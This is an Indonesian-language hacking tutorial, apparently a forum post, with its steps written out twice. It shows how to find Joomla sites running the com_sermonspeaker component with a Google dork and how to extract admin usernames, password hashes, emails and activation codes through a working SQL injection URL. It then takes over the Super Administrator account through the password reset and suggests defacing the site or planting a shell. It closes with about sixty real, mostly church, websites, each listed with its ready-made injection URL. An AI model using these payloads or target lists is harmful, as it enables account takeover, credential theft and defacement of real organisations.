Advertisemen
Oke langsung ke pembahasan aja yah
==================================
===================================
1. Pertama cari dulu target di google.
Dork : inurl:option=com_sermonspeaker
2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
![[Image: 1.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/1.jpg)
3. Langsung pasang exploit nya
![[Image: 2-1.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/2-1.jpg)
4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.
Tinggal masukin email admin nya
![[Image: 3.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/3.jpg)
5. Terus tekan submit dan akan muncul seperti ini
![[Image: 4.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/4.jpg)
Wah minta activation code, harus gimana nih ?
Tenang aja monggo kita cari aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini
Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini
![[Image: 5.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/5.jpg)
Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya
![[Image: 6.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/6.jpg)
6. Sekarang tekan lagi submit maka akan muncul seperti ini
![[Image: 7.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/7.jpg)
Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi
![[Image: 8.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/8.jpg)
7. Sekarang kita login as admin melalui
![[Image: 9.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/9.jpg)
Masukkan username admin dan password admin.
![[Image: 10.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/10.jpg)
Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.
Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll
Buat teman-teman yang mengalami kesulitan mendapatkan target ini saya kasih target + exploit nya
==================================
Code:
* Dork : inurl:option=com_sermonspeaker
Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/1. Pertama cari dulu target di google.
Dork : inurl:option=com_sermonspeaker
2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
3. Langsung pasang exploit nya
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.
Code:
/index.php?option=com_user&view=resetTinggal masukin email admin nya
5. Terus tekan submit dan akan muncul seperti ini
Wah minta activation code, harus gimana nih ?
Tenang aja monggo kita cari aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini
Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya
6. Sekarang tekan lagi submit maka akan muncul seperti ini
Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi
7. Sekarang kita login as admin melalui
Code:
http://[site]/[pacth]/administratorMasukkan username admin dan password admin.
Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.
Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll
Buat teman-teman yang mengalami kesulitan mendapatkan target ini saya kasih target + exploit nya
Code:
http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://gracebaptistabilene.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.beaconchurch.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://thehouseofprayeratbluewateroaks.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://newburghumc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.wellingtonpc.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://sermons.thesteeplechurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://cornerstonechurchedh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.wgic.org/i/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.worldprayerministriesinc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://yourcbcfamily.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.midacts.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.gileadbaptist.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://wesleyssi.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.fbclansing.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.fbcenterprise.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://tsawwassenalliance.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://newfaithchurchinsacultexas.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.cabotumc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.centerpointnh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.monfmc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.kruger.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.firstlyman.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://hccpromiseland.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.fmchurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.baysidebaptist.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://rockfordreformedchurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://nettleschurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://pbsda.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://victorybyfaith.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.cardiffcitychurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.nmccenter.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://simplemethods.org/deberrybaptistchurch/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.firstfree.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.stjohns-port.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.gladtidings.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.immanuelchurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.nlcm.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.redeemerjamison.org/joomla/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://trpc.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://gtaustin.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.communityofhopechurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.cicfamily.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.redruthbaptist.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://southgrandvillechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://iepvitarte.org/demo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://ijsselmuiden.gkv.nl/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://adventistasberriensprings.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.fcbrackenfell.co.za/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.acude.cc/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://loichung.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.elim.fo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.cariciasparaelalma.org/cr/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
http://www.kcccph.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
Advertisemen